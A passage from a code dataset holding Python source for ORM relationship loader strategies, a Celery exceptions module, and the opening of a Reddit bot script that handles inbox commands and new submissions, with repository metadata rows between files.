    """Serializable loader callable used by :class:`.LazyLoader`.

    Instances hold only the attribute key, so they can be pickled along
    with instance state; the actual strategy is re-resolved on call.
    """

    def __init__(self, key):
        self.key = key

    def __call__(self, state, passive=attributes.PASSIVE_OFF):
        # Resolve the relationship property and its lazy-load strategy
        # from the instance's mapper at call time.
        relationship_prop = state.manager.mapper._props[self.key]
        lazy_strategy = relationship_prop._strategies[LazyLoader]
        return lazy_strategy._load_for_state(state, passive)
@properties.RelationshipProperty.strategy_for(lazy="immediate")
class ImmediateLoader(AbstractRelationshipLoader):
    """Loader strategy for ``lazy='immediate'``: each row triggers the
    lazy loader for the attribute as soon as the row is processed.
    """

    def init_class_attribute(self, mapper):
        # Class-level instrumentation is the plain lazy loader; the
        # "immediate" behavior happens per-row below.
        lazy_strategy = self.parent_property._get_strategy_by_cls(LazyLoader)
        lazy_strategy.init_class_attribute(mapper)

    def setup_query(self, context, entity,
                    path, loadopt, adapter, column_collection=None,
                    parentmapper=None, **kwargs):
        # No SQL-level setup; loading occurs post-row.
        pass

    def create_row_processor(self, context, path, loadopt,
                             mapper, row, adapter):
        def _fetch_now(state, dict_, row):
            # Touch the attribute, firing its lazy callable immediately.
            state.get_impl(self.key).get(state, dict_)
        return None, None, _fetch_now
@log.class_logger
@properties.RelationshipProperty.strategy_for(lazy="subquery")
class SubqueryLoader(AbstractRelationshipLoader):
    """Loader strategy for ``lazy='subquery'``: emit a second SELECT,
    derived from the original query, which loads all related collections
    at once and is keyed back to parent rows by the parent's local
    columns.
    """

    def __init__(self, parent):
        super(SubqueryLoader, self).__init__(parent)
        self.join_depth = self.parent_property.join_depth

    def init_class_attribute(self, mapper):
        # Class-level instrumentation falls back to the lazy loader.
        self.parent_property.\
            _get_strategy_by_cls(LazyLoader).\
            init_class_attribute(mapper)

    def setup_query(self, context, entity,
                    path, loadopt, adapter,
                    column_collection=None,
                    parentmapper=None, **kwargs):
        """Build the "subquery" Query for this path and stash it in the
        context attributes for :meth:`.create_row_processor` to pick up.
        """
        if not context.query._enable_eagerloads:
            return
        path = path[self.parent_property]
        # build up a path indicating the path from the leftmost
        # entity to the thing we're subquery loading.
        with_poly_info = path.get(context.attributes,
                                  "path_with_polymorphic", None)
        if with_poly_info is not None:
            effective_entity = with_poly_info.entity
        else:
            effective_entity = self.mapper
        subq_path = context.attributes.get(('subquery_path', None),
                                           orm_util.PathRegistry.root)
        subq_path = subq_path + path
        # if not via query option, check for
        # a cycle
        if not path.contains(context.attributes, "loader"):
            if self.join_depth:
                if path.length / 2 > self.join_depth:
                    return
            elif subq_path.contains_mapper(self.mapper):
                return
        subq_mapper, leftmost_mapper, leftmost_attr, leftmost_relationship = \
            self._get_leftmost(subq_path)
        orig_query = context.attributes.get(
            ("orig_query", SubqueryLoader),
            context.query)
        # generate a new Query from the original, then
        # produce a subquery from it.
        left_alias = self._generate_from_original_query(
            orig_query, leftmost_mapper,
            leftmost_attr, leftmost_relationship,
            entity.mapper
        )
        # generate another Query that will join the
        # left alias to the target relationships.
        # basically doing a longhand
        # "from_self()".  (from_self() itself not quite industrial
        # strength enough for all contingencies...but very close)
        q = orig_query.session.query(effective_entity)
        q._attributes = {
            ("orig_query", SubqueryLoader): orig_query,
            ('subquery_path', None): subq_path
        }
        q = q._enable_single_crit(False)
        to_join, local_attr, parent_alias = \
            self._prep_for_joins(left_alias, subq_path)
        q = q.order_by(*local_attr)
        q = q.add_columns(*local_attr)
        q = self._apply_joins(q, to_join, left_alias,
                              parent_alias, effective_entity)
        q = self._setup_options(q, subq_path, orig_query, effective_entity)
        q = self._setup_outermost_orderby(q)
        # add new query to attributes to be picked up
        # by create_row_processor
        path.set(context.attributes, "subquery", q)

    def _get_leftmost(self, subq_path):
        """Return the mapper/attributes at the leftmost end of the
        subquery path, from which the inner query is derived.
        """
        subq_path = subq_path.path
        subq_mapper = orm_util._class_to_mapper(subq_path[0])
        # determine attributes of the leftmost mapper
        if self.parent.isa(subq_mapper) and self.parent_property is subq_path[1]:
            leftmost_mapper, leftmost_prop = \
                self.parent, self.parent_property
        else:
            leftmost_mapper, leftmost_prop = \
                subq_mapper, \
                subq_path[1]
        leftmost_cols = leftmost_prop.local_columns
        leftmost_attr = [
            leftmost_mapper._columntoproperty[c].class_attribute
            for c in leftmost_cols
        ]
        return subq_mapper, leftmost_mapper, leftmost_attr, leftmost_prop

    def _generate_from_original_query(self,
                                      orig_query, leftmost_mapper,
                                      leftmost_attr, leftmost_relationship,
                                      entity_mapper
                                      ):
        """Clone the user's original Query down to just the leftmost
        join columns and wrap it as an aliased subquery to join against.
        """
        # reformat the original query
        # to look only for significant columns
        q = orig_query._clone().correlate(None)
        # set a real "from" if not present, as this is more
        # accurate than just going off of the column expression
        if not q._from_obj and entity_mapper.isa(leftmost_mapper):
            q._set_select_from([entity_mapper], False)
        target_cols = q._adapt_col_list(leftmost_attr)
        # select from the identity columns of the outer
        q._set_entities(target_cols)
        distinct_target_key = leftmost_relationship.distinct_target_key
        if distinct_target_key is True:
            q._distinct = True
        elif distinct_target_key is None:
            # if target_cols refer to a non-primary key or only
            # part of a composite primary key, set the q as distinct
            for t in set(c.table for c in target_cols):
                if not set(target_cols).issuperset(t.primary_key):
                    q._distinct = True
                    break
        if q._order_by is False:
            q._order_by = leftmost_mapper.order_by
        # don't need ORDER BY if no limit/offset
        if q._limit is None and q._offset is None:
            q._order_by = None
        # the original query now becomes a subquery
        # which we'll join onto.
        embed_q = q.with_labels().subquery()
        left_alias = orm_util.AliasedClass(leftmost_mapper, embed_q,
                                           use_mapper_path=True)
        return left_alias

    def _prep_for_joins(self, left_alias, subq_path):
        """Compute the (mapper, key) chain to join, the parent-side local
        attributes, and the aliased immediate parent.
        """
        # figure out what's being joined.  a.k.a. the fun part
        to_join = []
        pairs = list(subq_path.pairs())
        for i, (mapper, prop) in enumerate(pairs):
            if i > 0:
                # look at the previous mapper in the chain -
                # if it is as or more specific than this prop's
                # mapper, use that instead.
                # note we have an assumption here that
                # the non-first element is always going to be a mapper,
                # not an AliasedClass
                prev_mapper = pairs[i - 1][1].mapper
                to_append = prev_mapper if prev_mapper.isa(mapper) else mapper
            else:
                to_append = mapper
            to_join.append((to_append, prop.key))
        # determine the immediate parent class we are joining from,
        # which needs to be aliased.
        if len(to_join) > 1:
            info = inspect(to_join[-1][0])
        if len(to_join) < 2:
            # in the case of a one level eager load, this is the
            # leftmost "left_alias".
            parent_alias = left_alias
        elif info.mapper.isa(self.parent):
            # In the case of multiple levels, retrieve
            # it from subq_path[-2]. This is the same as self.parent
            # in the vast majority of cases, and [ticket:2014]
            # illustrates a case where sub_path[-2] is a subclass
            # of self.parent
            parent_alias = orm_util.AliasedClass(to_join[-1][0],
                                                 use_mapper_path=True)
        else:
            # if of_type() were used leading to this relationship,
            # self.parent is more specific than subq_path[-2]
            parent_alias = orm_util.AliasedClass(self.parent,
                                                 use_mapper_path=True)
        local_cols = self.parent_property.local_columns
        local_attr = [
            getattr(parent_alias, self.parent._columntoproperty[c].key)
            for c in local_cols
        ]
        return to_join, local_attr, parent_alias

    def _apply_joins(self, q, to_join, left_alias, parent_alias,
                     effective_entity):
        """Chain the joins computed by _prep_for_joins onto *q*."""
        for i, (mapper, key) in enumerate(to_join):
            # we need to use query.join() as opposed to
            # orm.join() here because of the
            # rich behavior it brings when dealing with
            # "with_polymorphic" mappers.  "aliased"
            # and "from_joinpoint" take care of most of
            # the chaining and aliasing for us.
            first = i == 0
            middle = i < len(to_join) - 1
            second_to_last = i == len(to_join) - 2
            last = i == len(to_join) - 1
            if first:
                attr = getattr(left_alias, key)
                if last and effective_entity is not self.mapper:
                    attr = attr.of_type(effective_entity)
            else:
                if last and effective_entity is not self.mapper:
                    attr = getattr(parent_alias, key).\
                        of_type(effective_entity)
                else:
                    attr = key
            if second_to_last:
                q = q.join(parent_alias, attr, from_joinpoint=True)
            else:
                q = q.join(attr, aliased=middle, from_joinpoint=True)
        return q

    def _setup_options(self, q, subq_path, orig_query, effective_entity):
        """Carry loader options from the original query into *q*."""
        # propagate loader options etc. to the new query.
        # these will fire relative to subq_path.
        q = q._with_current_path(subq_path)
        q = q._conditional_options(*orig_query._with_options)
        if orig_query._populate_existing:
            q._populate_existing = orig_query._populate_existing
        return q

    def _setup_outermost_orderby(self, q):
        """Apply the relationship's order_by, adapted through the
        eager join, to the outermost query.
        """
        if self.parent_property.order_by:
            # if there's an ORDER BY, alias it the same
            # way joinedloader does, but we have to pull out
            # the "eagerjoin" from the query.
            # this really only picks up the "secondary" table
            # right now.
            eagerjoin = q._from_obj[0]
            eager_order_by = \
                eagerjoin._target_adapter.\
                copy_and_process(
                    util.to_list(
                        self.parent_property.order_by
                    )
                )
            q = q.order_by(*eager_order_by)
        return q

    class _SubqCollections(object):
        """Given a :class:`.Query` used to emit the "subquery load",
        provide a load interface that executes the query at the
        first moment a value is needed.
        """
        # _data maps parent-key tuples -> list of loaded entities;
        # populated lazily on first access.
        _data = None

        def __init__(self, subq):
            self.subq = subq

        def get(self, key, default):
            if self._data is None:
                self._load()
            return self._data.get(key, default)

        def _load(self):
            # Rows are (entity, *parent_local_cols); group by the
            # trailing key columns and keep the entity.
            self._data = dict(
                (k, [vv[0] for vv in v])
                for k, v in itertools.groupby(
                    self.subq,
                    lambda x: x[1:]
                )
            )

        def loader(self, state, dict_, row):
            # Used as the "exec" row processor: force the load early.
            if self._data is None:
                self._load()

    def create_row_processor(self, context, path, loadopt,
                             mapper, row, adapter):
        """Return row processors which fetch this attribute's value from
        the lazily-executed subquery collections.
        """
        if not self.parent.class_manager[self.key].impl.supports_population:
            raise sa_exc.InvalidRequestError(
                "'%s' does not support object "
                "population - eager loading cannot be applied." %
                self)
        path = path[self.parent_property]
        subq = path.get(context.attributes, 'subquery')
        if subq is None:
            return None, None, None
        local_cols = self.parent_property.local_columns
        # cache the loaded collections in the context
        # so that inheriting mappers don't re-load when they
        # call upon create_row_processor again
        collections = path.get(context.attributes, "collections")
        if collections is None:
            collections = self._SubqCollections(subq)
            path.set(context.attributes, 'collections', collections)
        if adapter:
            local_cols = [adapter.columns[c] for c in local_cols]
        if self.uselist:
            return self._create_collection_loader(collections, local_cols)
        else:
            return self._create_scalar_loader(collections, local_cols)

    def _create_collection_loader(self, collections, local_cols):
        def load_collection_from_subq(state, dict_, row):
            collection = collections.get(
                tuple([row[col] for col in local_cols]),
                ()
            )
            state.get_impl(self.key).\
                set_committed_value(state, dict_, collection)
        return load_collection_from_subq, None, None, collections.loader

    def _create_scalar_loader(self, collections, local_cols):
        def load_scalar_from_subq(state, dict_, row):
            collection = collections.get(
                tuple([row[col] for col in local_cols]),
                (None,)
            )
            if len(collection) > 1:
                util.warn(
                    "Multiple rows returned with "
                    "uselist=False for eagerly-loaded attribute '%s' "
                    % self)
            scalar = collection[0]
            state.get_impl(self.key).\
                set_committed_value(state, dict_, scalar)
        return load_scalar_from_subq, None, None, collections.loader
@log.class_logger
@properties.RelationshipProperty.strategy_for(lazy="joined")
@properties.RelationshipProperty.strategy_for(lazy=False)
class JoinedLoader(AbstractRelationshipLoader):
    """Provide loading behavior for a :class:`.RelationshipProperty`
    using joined eager loading.
    """

    def __init__(self, parent):
        super(JoinedLoader, self).__init__(parent)
        self.join_depth = self.parent_property.join_depth

    def init_class_attribute(self, mapper):
        # Class-level instrumentation falls back to the lazy loader.
        self.parent_property.\
            _get_strategy_by_cls(LazyLoader).init_class_attribute(mapper)

    def setup_query(self, context, entity, path, loadopt, adapter, \
                    column_collection=None, parentmapper=None,
                    **kwargs):
        """Add a left outer join to the statement thats being constructed."""
        if not context.query._enable_eagerloads:
            return
        path = path[self.parent_property]
        with_polymorphic = None
        user_defined_adapter = self._init_user_defined_eager_proc(
            loadopt, context) if loadopt else False
        if user_defined_adapter is not False:
            # contains_eager() case: the user supplied the join/alias.
            clauses, adapter, add_to_collection = \
                self._setup_query_on_user_defined_adapter(
                    context, entity, path, adapter,
                    user_defined_adapter
                )
        else:
            # if not via query option, check for
            # a cycle
            if not path.contains(context.attributes, "loader"):
                if self.join_depth:
                    if path.length / 2 > self.join_depth:
                        return
                elif path.contains_mapper(self.mapper):
                    return
            clauses, adapter, add_to_collection = self._generate_row_adapter(
                context, entity, path, loadopt, adapter,
                column_collection, parentmapper
            )
        with_poly_info = path.get(
            context.attributes,
            "path_with_polymorphic",
            None
        )
        if with_poly_info is not None:
            with_polymorphic = with_poly_info.with_polymorphic_mappers
        else:
            with_polymorphic = None
        path = path[self.mapper]
        # Recursively set up columns/joins for the target mapper's own
        # properties, adapted into the eager join.
        for value in self.mapper._iterate_polymorphic_properties(
                mappers=with_polymorphic):
            value.setup(
                context,
                entity,
                path,
                clauses,
                parentmapper=self.mapper,
                column_collection=add_to_collection)
        if with_poly_info is not None and \
                None in set(context.secondary_columns):
            raise sa_exc.InvalidRequestError(
                "Detected unaliased columns when generating joined "
                "load.  Make sure to use aliased=True or flat=True "
                "when using joined loading with with_polymorphic()."
            )

    def _init_user_defined_eager_proc(self, loadopt, context):
        """Resolve (and cache) the row adapter for a user-defined
        contains_eager() option, or return False if not applicable.
        """
        # check if the opt applies at all
        if "eager_from_alias" not in loadopt.local_opts:
            # nope
            return False
        path = loadopt.path.parent
        # the option applies.  check if the "user_defined_eager_row_processor"
        # has been built up.
        adapter = path.get(context.attributes,
                           "user_defined_eager_row_processor", False)
        if adapter is not False:
            # just return it
            return adapter
        # otherwise figure it out.
        alias = loadopt.local_opts["eager_from_alias"]
        root_mapper, prop = path[-2:]
        #from .mapper import Mapper
        #from .interfaces import MapperProperty
        #assert isinstance(root_mapper, Mapper)
        #assert isinstance(prop, MapperProperty)
        if alias is not None:
            if isinstance(alias, str):
                alias = prop.target.alias(alias)
            adapter = sql_util.ColumnAdapter(alias,
                                             equivalents=prop.mapper._equivalent_columns)
        else:
            if path.contains(context.attributes, "path_with_polymorphic"):
                with_poly_info = path.get(context.attributes,
                                          "path_with_polymorphic")
                adapter = orm_util.ORMAdapter(
                    with_poly_info.entity,
                    equivalents=prop.mapper._equivalent_columns)
            else:
                adapter = context.query._polymorphic_adapters.get(prop.mapper, None)
        path.set(context.attributes,
                 "user_defined_eager_row_processor",
                 adapter)
        return adapter

    def _setup_query_on_user_defined_adapter(self, context, entity,
                                             path, adapter, user_defined_adapter):
        """Wrap and store the user-defined adapter for SQL rendering;
        target columns go in the "primary" column collection.
        """
        # apply some more wrapping to the "user defined adapter"
        # if we are setting up the query for SQL render.
        adapter = entity._get_entity_clauses(context.query, context)
        if adapter and user_defined_adapter:
            user_defined_adapter = user_defined_adapter.wrap(adapter)
            path.set(context.attributes, "user_defined_eager_row_processor",
                     user_defined_adapter)
        elif adapter:
            user_defined_adapter = adapter
            path.set(context.attributes, "user_defined_eager_row_processor",
                     user_defined_adapter)
        add_to_collection = context.primary_columns
        return user_defined_adapter, adapter, add_to_collection

    def _generate_row_adapter(self,
                              context, entity, path, loadopt, adapter,
                              column_collection, parentmapper
                              ):
        """Create the aliased target and ORMAdapter for this eager join
        and schedule the actual join construction.
        """
        with_poly_info = path.get(
            context.attributes,
            "path_with_polymorphic",
            None
        )
        if with_poly_info:
            to_adapt = with_poly_info.entity
        else:
            to_adapt = orm_util.AliasedClass(self.mapper,
                                             flat=True,
                                             use_mapper_path=True)
        clauses = orm_util.ORMAdapter(
            to_adapt,
            equivalents=self.mapper._equivalent_columns,
            adapt_required=True)
        assert clauses.aliased_class is not None
        if self.parent_property.direction != interfaces.MANYTOONE:
            # Collections can multiply parent rows, which affects how
            # LIMIT/OFFSET queries are wrapped.
            context.multi_row_eager_loaders = True
        innerjoin = (
            loadopt.local_opts.get(
                'innerjoin', self.parent_property.innerjoin)
            if loadopt is not None
            else self.parent_property.innerjoin
        )
        # Defer the actual join creation until compile time.
        context.create_eager_joins.append(
            (self._create_eager_join, context,
             entity, path, adapter,
             parentmapper, clauses, innerjoin)
        )
        add_to_collection = context.secondary_columns
        path.set(context.attributes, "eager_row_processor", clauses)
        return clauses, adapter, add_to_collection

    def _create_eager_join(self, context, entity,
                           path, adapter, parentmapper,
                           clauses, innerjoin):
        """Construct the eager JOIN and attach it to the context."""
        if parentmapper is None:
            localparent = entity.mapper
        else:
            localparent = parentmapper
        # whether or not the Query will wrap the selectable in a subquery,
        # and then attach eager load joins to that (i.e., in the case of
        # LIMIT/OFFSET etc.)
        should_nest_selectable = context.multi_row_eager_loaders and \
            context.query._should_nest_selectable
        entity_key = None
        if entity not in context.eager_joins and \
                not should_nest_selectable and \
                context.from_clause:
            index, clause = \
                sql_util.find_join_source(
                    context.from_clause, entity.selectable)
            if clause is not None:
                # join to an existing FROM clause on the query.
                # key it to its list index in the eager_joins dict.
                # Query._compile_context will adapt as needed and
                # append to the FROM clause of the select().
                entity_key, default_towrap = index, clause
        if entity_key is None:
            entity_key, default_towrap = entity, entity.selectable
        towrap = context.eager_joins.setdefault(entity_key, default_towrap)
        if adapter:
            if getattr(adapter, 'aliased_class', None):
                onclause = getattr(
                    adapter.aliased_class, self.key,
                    self.parent_property)
            else:
                onclause = getattr(
                    orm_util.AliasedClass(
                        self.parent,
                        adapter.selectable,
                        use_mapper_path=True
                    ),
                    self.key, self.parent_property
                )
        else:
            onclause = self.parent_property
        assert clauses.aliased_class is not None
        # An INNER join chained to an existing OUTER join must either be
        # nested inside it or demoted to OUTER to preserve results.
        join_to_outer = innerjoin and isinstance(towrap, sql.Join) and towrap.isouter
        if join_to_outer and innerjoin == 'nested':
            inner = orm_util.join(
                towrap.right,
                clauses.aliased_class,
                onclause,
                isouter=False
            )
            eagerjoin = orm_util.join(
                towrap.left,
                inner,
                towrap.onclause,
                isouter=True
            )
            eagerjoin._target_adapter = inner._target_adapter
        else:
            if join_to_outer:
                innerjoin = False
            eagerjoin = orm_util.join(
                towrap,
                clauses.aliased_class,
                onclause,
                isouter=not innerjoin
            )
        context.eager_joins[entity_key] = eagerjoin
        # send a hint to the Query as to where it may "splice" this join
        eagerjoin.stop_on = entity.selectable
        if self.parent_property.secondary is None and \
                not parentmapper:
            # for parentclause that is the non-eager end of the join,
            # ensure all the parent cols in the primaryjoin are actually
            # in the
            # columns clause (i.e. are not deferred), so that aliasing applied
            # by the Query propagates those columns outward.
            # This has the effect
            # of "undefering" those columns.
            for col in sql_util._find_columns(
                    self.parent_property.primaryjoin):
                if localparent.mapped_table.c.contains_column(col):
                    if adapter:
                        col = adapter.columns[col]
                    context.primary_columns.append(col)
        if self.parent_property.order_by:
            context.eager_order_by += \
                eagerjoin._target_adapter.\
                copy_and_process(
                    util.to_list(
                        self.parent_property.order_by
                    )
                )

    def _create_eager_adapter(self, context, row, adapter, path, loadopt):
        """Return the row adapter for reading eagerly-joined columns from
        *row*, or False to signal a degrade to lazy loading.
        """
        user_defined_adapter = self._init_user_defined_eager_proc(
            loadopt, context) if loadopt else False
        if user_defined_adapter is not False:
            decorator = user_defined_adapter
            # user defined eagerloads are part of the "primary"
            # portion of the load.
            # the adapters applied to the Query should be honored.
            if context.adapter and decorator:
                decorator = decorator.wrap(context.adapter)
            elif context.adapter:
                decorator = context.adapter
        else:
            decorator = path.get(context.attributes, "eager_row_processor")
            if decorator is None:
                return False
        try:
            self.mapper.identity_key_from_row(row, decorator)
            return decorator
        except KeyError:
            # no identity key - dont return a row
            # processor, will cause a degrade to lazy
            return False

    def create_row_processor(self, context, path, loadopt, mapper, row, adapter):
        """Return row processors populating this attribute from the eager
        join, or delegate to the lazy loader when the join isn't present.
        """
        if not self.parent.class_manager[self.key].impl.supports_population:
            raise sa_exc.InvalidRequestError(
                "'%s' does not support object "
                "population - eager loading cannot be applied." %
                self)
        our_path = path[self.parent_property]
        eager_adapter = self._create_eager_adapter(
            context,
            row,
            adapter, our_path, loadopt)
        if eager_adapter is not False:
            key = self.key
            _instance = loading.instance_processor(
                self.mapper,
                context,
                our_path[self.mapper],
                eager_adapter)
            if not self.uselist:
                return self._create_scalar_loader(context, key, _instance)
            else:
                return self._create_collection_loader(context, key, _instance)
        else:
            return self.parent_property.\
                _get_strategy_by_cls(LazyLoader).\
                create_row_processor(
                    context, path, loadopt,
                    mapper, row, adapter)

    def _create_collection_loader(self, context, key, _instance):
        def load_collection_from_joined_new_row(state, dict_, row):
            collection = attributes.init_state_collection(
                state, dict_, key)
            result_list = util.UniqueAppender(collection,
                                              'append_without_event')
            context.attributes[(state, key)] = result_list
            _instance(row, result_list)

        def load_collection_from_joined_existing_row(state, dict_, row):
            if (state, key) in context.attributes:
                result_list = context.attributes[(state, key)]
            else:
                # appender_key can be absent from context.attributes
                # with isnew=False when self-referential eager loading
                # is used; the same instance may be present in two
                # distinct sets of result columns
                collection = attributes.init_state_collection(state,
                                                              dict_, key)
                result_list = util.UniqueAppender(
                    collection,
                    'append_without_event')
                context.attributes[(state, key)] = result_list
            _instance(row, result_list)

        def load_collection_from_joined_exec(state, dict_, row):
            _instance(row, None)
        return load_collection_from_joined_new_row, \
            load_collection_from_joined_existing_row, \
            None, load_collection_from_joined_exec

    def _create_scalar_loader(self, context, key, _instance):
        def load_scalar_from_joined_new_row(state, dict_, row):
            # set a scalar object instance directly on the parent
            # object, bypassing InstrumentedAttribute event handlers.
            dict_[key] = _instance(row, None)

        def load_scalar_from_joined_existing_row(state, dict_, row):
            # call _instance on the row, even though the object has
            # been created, so that we further descend into properties
            existing = _instance(row, None)
            if existing is not None \
                    and key in dict_ \
                    and existing is not dict_[key]:
                util.warn(
                    "Multiple rows returned with "
                    "uselist=False for eagerly-loaded attribute '%s' "
                    % self)

        def load_scalar_from_joined_exec(state, dict_, row):
            _instance(row, None)
        return load_scalar_from_joined_new_row, \
            load_scalar_from_joined_existing_row, \
            None, load_scalar_from_joined_exec
def single_parent_validator(desc, prop):
    """Install 'append' and 'set' attribute events on *desc* which
    enforce that an instance assigned to relationship *prop* belongs to
    at most one parent at a time.
    """
    def _validate(state, value, oldvalue, initiator):
        # Only act on real values arriving through this property.
        if value is None or initiator.key != prop.key:
            return value
        value_state = attributes.instance_state(value)
        if initiator.hasparent(value_state) and oldvalue is not value:
            raise sa_exc.InvalidRequestError(
                "Instance %s is already associated with an instance "
                "of %s via its %s attribute, and is only allowed a "
                "single parent." %
                (orm_util.instance_str(value), state.class_, prop)
            )
        return value

    def on_append(state, value, initiator):
        return _validate(state, value, None, initiator)

    def on_set(state, value, oldvalue, initiator):
        return _validate(state, value, oldvalue, initiator)

    event.listen(desc, 'append', on_append, raw=True, retval=True,
                 active_history=True)
    event.listen(desc, 'set', on_set, raw=True, retval=True,
                 active_history=True)
| 38.276712
| 85
| 0.568249
|
4a07e7f2daa5a4b8726f1363698797ba9c2bb0f7
| 2,837
|
py
|
Python
|
vendor-local/lib/python/celery/exceptions.py
|
Mozilla-GitHub-Standards/6f0d85288b5b0ef8beecb60345173dc14c98e40f48e1307a444ab1e08231e695
|
bf6a382913901ad193d907f022086931df0de8c4
|
[
"BSD-3-Clause"
] | 1
|
2015-07-13T03:29:04.000Z
|
2015-07-13T03:29:04.000Z
|
vendor-local/lib/python/celery/exceptions.py
|
Mozilla-GitHub-Standards/6f0d85288b5b0ef8beecb60345173dc14c98e40f48e1307a444ab1e08231e695
|
bf6a382913901ad193d907f022086931df0de8c4
|
[
"BSD-3-Clause"
] | 2
|
2015-03-03T23:02:19.000Z
|
2019-03-30T04:45:51.000Z
|
vendor-local/lib/python/celery/exceptions.py
|
Mozilla-GitHub-Standards/6f0d85288b5b0ef8beecb60345173dc14c98e40f48e1307a444ab1e08231e695
|
bf6a382913901ad193d907f022086931df0de8c4
|
[
"BSD-3-Clause"
] | 2
|
2016-04-15T11:43:05.000Z
|
2016-04-15T11:43:15.000Z
|
# -*- coding: utf-8 -*-
"""
celery.exceptions
~~~~~~~~~~~~~~~~~
This module contains all exceptions used by the Celery API.
"""
from __future__ import absolute_import
from billiard.exceptions import ( # noqa
SoftTimeLimitExceeded, TimeLimitExceeded, WorkerLostError, Terminated,
)
# Message template used by NotRegistered.__repr__ below.
UNREGISTERED_FMT = """\
Task of kind %s is not registered, please make sure it's imported.\
"""

class SecurityError(Exception):
    """Security related exceptions.
    Handle with care.
    """

class Ignore(Exception):
    """A task can raise this to ignore doing state updates."""

class SystemTerminate(SystemExit):
    """Signals that the worker should terminate."""

class QueueNotFound(KeyError):
    """Task routed to a queue not in CELERY_QUEUES."""

class ImproperlyConfigured(ImportError):
    """Celery is somehow improperly configured."""

class NotRegistered(KeyError):
    """The task is not registered."""

    def __repr__(self):
        # Renders the human-readable template rather than KeyError's
        # default quoted-key repr.
        return UNREGISTERED_FMT % str(self)

class AlreadyRegistered(Exception):
    """The task is already registered."""

class TimeoutError(Exception):
    """The operation timed out."""
    # NOTE(review): shadows the Python 3 builtin TimeoutError when
    # imported unqualified; this module predates it (py2-era code).

class MaxRetriesExceededError(Exception):
    """The tasks max restart limit has been exceeded."""
class RetryTaskError(Exception):
    """The task is to be retried later."""

    def __init__(self, message=None, exc=None, when=None, **kwargs):
        """:param message: optional override for __str__.
        :param exc: original exception (or an already-safe string repr,
            e.g. when reconstructed by __reduce__ after pickling).
        :param when: retry ETA; an int (seconds) or a datetime-like value.
        """
        from kombu.utils.encoding import safe_repr
        self.message = message
        # NOTE(review): ``basestring`` is Python 2 only; this vendored
        # module targets py2.
        if isinstance(exc, basestring):
            # Already a string repr (e.g. after unpickling): the live
            # exception object is not recoverable.
            self.exc, self.excs = None, exc
        else:
            # Keep the live exception plus a safe string repr so the
            # error survives pickling across process boundaries.
            self.exc, self.excs = exc, safe_repr(exc) if exc else None
        self.when = when
        Exception.__init__(self, exc, when, **kwargs)

    def humanize(self):
        """Return a human-readable description of the retry ETA."""
        if isinstance(self.when, int):
            return 'in %ss' % self.when
        return 'at %s' % (self.when, )

    def __str__(self):
        if self.message:
            return self.message
        if self.excs:
            return 'Retry %s: %r' % (self.humanize(), self.excs)
        return 'Retry %s' % self.humanize()

    def __reduce__(self):
        # Pickle support: pass the *string* repr (excs) as the exc
        # argument; __init__ detects the string and stores it back
        # into self.excs.
        return self.__class__, (self.message, self.excs, self.when)
class TaskRevokedError(Exception):
    """The task has been revoked, so no result available."""

class NotConfigured(UserWarning):
    """Celery has not been configured, as no config module has been found."""

class AlwaysEagerIgnored(UserWarning):
    """send_task ignores CELERY_ALWAYS_EAGER option"""

class InvalidTaskError(Exception):
    """The task has invalid data or is not properly constructed."""

class CPendingDeprecationWarning(PendingDeprecationWarning):
    # Celery-specific subclass so callers can filter warnings emitted
    # by this library separately from other libraries'.
    pass

class CDeprecationWarning(DeprecationWarning):
    # Celery-specific subclass; see CPendingDeprecationWarning.
    pass

class IncompleteStream(Exception):
    """Found the end of a stream of data, but the data is not yet complete."""
| 24.042373
| 78
| 0.670779
|
4a07e855f1f11c1aca7ba2a099f714fc1fb80962
| 6,505
|
py
|
Python
|
strategy.py
|
Pyprohly/powershell-bot
|
8da0831f09af95b2524a1988c44b6d6cb6d0ae0b
|
[
"MIT"
] | 4
|
2019-02-03T21:01:30.000Z
|
2019-04-15T19:09:27.000Z
|
strategy.py
|
Pyprohly/powershell-bot
|
8da0831f09af95b2524a1988c44b6d6cb6d0ae0b
|
[
"MIT"
] | null | null | null |
strategy.py
|
Pyprohly/powershell-bot
|
8da0831f09af95b2524a1988c44b6d6cb6d0ae0b
|
[
"MIT"
] | null | null | null |
import os
import time
import logging
# BUGFIX: RotatingFileHandler lives in the logging.handlers submodule,
# which ``import logging`` alone does not guarantee to load; without this
# import the handler construction below can raise AttributeError.
import logging.handlers
from pathlib import Path
import re

import praw, prawcore

from reddit import reddit
import db_services
from regex_checks import TopicFlags, ExtraFlags, match_control
from messages import get_message
from powershell_bot import register

# Run relative to this script's directory so the log path below resolves
# consistently regardless of the caller's cwd.
script_path = Path(__file__).resolve()
os.chdir(script_path.parent)

logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
#logger.addHandler(logging.StreamHandler())
#logger.disabled = True

# File logging is enabled only when the ./log directory already exists.
log_file = script_path.parent / 'log' / 'powershell_bot.log'
if log_file.parent.is_dir():
    log_format = '%(asctime)s %(levelname)s %(funcName)s:%(lineno)d | %(message)s'
    rfh_config = {
        'filename': log_file,
        'encoding': 'utf-8',
        'maxBytes': 5*1024*1024,  # 5 megabytes
        'backupCount': 8
    }
    rfh = logging.handlers.RotatingFileHandler(**rfh_config)
    rfh.setFormatter(logging.Formatter(log_format))
    logger.addHandler(rfh)
    logger.info('Log ({}): {}'.format(logger.name, log_file.absolute()))

# Inbox command patterns: "!delete [t1_]<id>" and "!recheck [tN_]<id>".
delete_command_pattern = r'^!delete(?: |\+)+(?:(t1)_)?([a-z0-9]{1,12})$'
delete_regexp = re.compile(delete_command_pattern, re.I)
recheck_command_pattern = r'^!recheck +(?:(t[1-6])_)?([a-z0-9]{1,12})$'
recheck_regexp = re.compile(recheck_command_pattern, re.I)

ignore_inbox_items_older_than = 60 * 2  # 2 minutes

me = reddit.user.me()
if me is None:
    raise RuntimeError('user authentication required')
# Users allowed to force-delete bot comments: the configured owner and
# the bot account itself (compared case-insensitively).
trustees = [i.lower() for i in (register['owner'], me.name)]
def process_subsmission(submission):
    """Analyse a new self-post and reply with advice when topic regexes
    match; records the reply via db_services.

    NOTE(review): the name contains a typo ("subsmission") but is kept,
    since callers outside this chunk reference it by this name.
    """
    if not submission.is_self:
        logger.info('Skip: link submission: {}'.format(submission.permalink))
        return
    # Rough check to see if bot hasn't replied already
    submission.comments.replace_more(limit=0)
    if any(1 for comment in submission.comments if comment.author == me):
        logger.warning('Skip: already replied to: {}'.format(submission.permalink))
        return
    # Run all regex checks over the post body; b = topic flags matched,
    # y = auxiliary flags (e.g. presence of a code block).
    match_control.check_all(submission.selftext)
    b = match_control[TopicFlags]
